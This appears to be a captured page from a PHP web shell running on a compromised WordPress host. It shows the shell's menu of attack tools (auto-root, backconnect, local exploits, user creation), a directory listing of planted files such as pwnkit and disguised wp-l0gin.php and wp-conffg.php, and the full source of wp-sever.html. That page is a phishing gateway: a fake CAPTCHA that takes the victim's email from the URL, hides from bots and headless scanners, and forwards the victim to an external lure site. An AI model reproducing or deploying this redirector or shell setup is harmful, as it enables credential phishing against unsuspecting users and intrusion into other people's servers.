Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
empowernetkenyajuly2026 /
[ HOME SHELL ]
Name
Size
Permission
Action
.tmb
[ DIR ]
drwxrwxrwx
760093
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
goods.php
173.77
KB
-rw-r--r--
index.php
13.35
KB
-rw-r--r--
license.txt
19.44
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
qing.php
26
B
-rw-r--r--
sid4.php
78.48
KB
-rw-r--r--
wp-activate.php
7.54
KB
-rw----r--
wp-blog-header.php
351
B
-rw----r--
wp-comments-post.php
2.27
KB
-rw----r--
wp-conffg.php
132.17
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw----r--
wp-config.php
3.53
KB
-rw-rw-rw-
wp-content-css.php
258.9
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw----r--
wp-editor.php
53.57
KB
-rw-r--r--
wp-hader-css.php
9.53
KB
-rw-r--r--
wp-l0gin.php
170.48
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw----r--
wp-load.php
3.84
KB
-rw----r--
wp-login.php
52.95
KB
-rw----r--
wp-mail.php
8.52
KB
-rw----r--
wp-settings.php
32.38
KB
-rw----r--
wp-sever.html
6.33
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw----r--
wp-storage.html
6.51
KB
-rw-r--r--
wp-theme-css.php
302.97
KB
-rw-r--r--
wp-theme.php
216.5
KB
-rw-r--r--
wp-trackback.php
5.27
KB
-rw----r--
xmlrpc.php
3.13
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-sever.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <title>Scan</title> <style> body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f0f0; } .container { text-align: center; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } #captchaQuestion { margin-bottom: 20px; font-size: 18px; } #captchaInput { padding: 10px; font-size: 16px; margin-bottom: 10px; } #verifyButton { padding: 10px 20px; font-size: 16px; background-color: #28a745; color: white; border: none; border-radius: 4px; cursor: pointer; } #verifyButton:disabled { background-color: #ccc; cursor: not-allowed; } #error { color: red; display: none; margin-top: 10px; } </style> </head> <body> <div class="container"> <h2>Please Verify</h2> <div id="captchaQuestion"></div> <input type="text" id="captchaInput" placeholder="Enter answer"> <button id="verifyButton" disabled>Verify</button> <div id="error">Verification failed. Please try again.</div> </div> <script> // Bot detection variables let mouseMoved = false; let keyPressed = false; let startTime = Date.now(); let extractedEmail = null; // Common bot user-agents (partial list) const botUserAgents = [ 'bot', 'crawler', 'spider', 'googlebot', 'bingbot', 'yandexbot', 'baiduspider', 'slurp', 'duckduckbot', 'facebot', 'ia_archiver' ]; // Check user-agent for bot signatures function isBotUserAgent() { const ua = navigator.userAgent.toLowerCase(); return botUserAgents.some(bot => ua.includes(bot)); } // Validate email format function isValidEmail(email) { const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; return emailRegex.test(email); } // Extract email from URL fragment function extractEmailFromHash() { const hash = window.location.hash.substring(1); // Remove '#' if (hash && isValidEmail(hash)) { extractedEmail = hash; console.log('Extracted email:', extractedEmail); // Debugging } else { extractedEmail = null; console.log('No valid email found in URL hash'); } } // Generate simple math CAPTCHA function generateCaptcha() { const num1 = Math.floor(Math.random() * 10) + 1; const num2 = Math.floor(Math.random() * 10) + 1; const answer = num1 + num2; document.getElementById('captchaQuestion').textContent = `What is ${num1} + ${num2}?`; return answer; } // Initialize CAPTCHA and extract email let correctAnswer = generateCaptcha(); extractEmailFromHash(); // Behavioral checks document.addEventListener('mousemove', () => { mouseMoved = true; checkVerificationReadiness(); }); document.addEventListener('keydown', () => { keyPressed = true; checkVerificationReadiness(); }); // Enable verify button only after behavioral checks pass function checkVerificationReadiness() { const timeElapsed = Date.now() - startTime > 2000; // At least 2 seconds if (mouseMoved && keyPressed && timeElapsed) { document.getElementById('verifyButton').disabled = false; } } // Verification logic document.getElementById('verifyButton').addEventListener('click', () => { const userAnswer = document.getElementById('captchaInput').value.trim(); const errorDiv = document.getElementById('error'); // Block if user-agent is a bot if (isBotUserAgent()) { errorDiv.style.display = 'block'; errorDiv.textContent = 'Access denied.'; return; } // Check CAPTCHA answer if (parseInt(userAnswer) === correctAnswer) { // Construct redirect URL with email in hash (unencoded) let redirectUrl = 'https://jerrysmithtech.wixstudio.com/zyprox'; if (extractedEmail) { redirectUrl += `#${extractedEmail}`; } console.log('Redirecting to:', redirectUrl); // Debugging window.location.href = redirectUrl; } else { errorDiv.style.display = 'block'; document.getElementById('captchaInput').value = ''; // Generate new CAPTCHA correctAnswer = generateCaptcha(); } }); // Prevent automated form submission document.addEventListener('submit', (e) => { e.preventDefault(); // Disable any form submissions }); // Optional: Block headless browsers by checking WebGL function isHeadless() { const gl = document.createElement('canvas').getContext('webgl'); if (!gl) return true; const debugInfo = gl.getExtension('WEBGL_debug_renderer_info'); if (!debugInfo) return true; const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL); return renderer.includes('SwiftShader') || renderer.includes('llvmpipe'); } if (isHeadless()) { document.getElementById('error').style.display = 'block'; document.getElementById('error').textContent = 'Access denied.'; document.getElementById('verifyButton').disabled = true; } </script> <script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'936dc335481abcd2',t:'MTc0NTc1MTA2My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script> </body> </html>
Close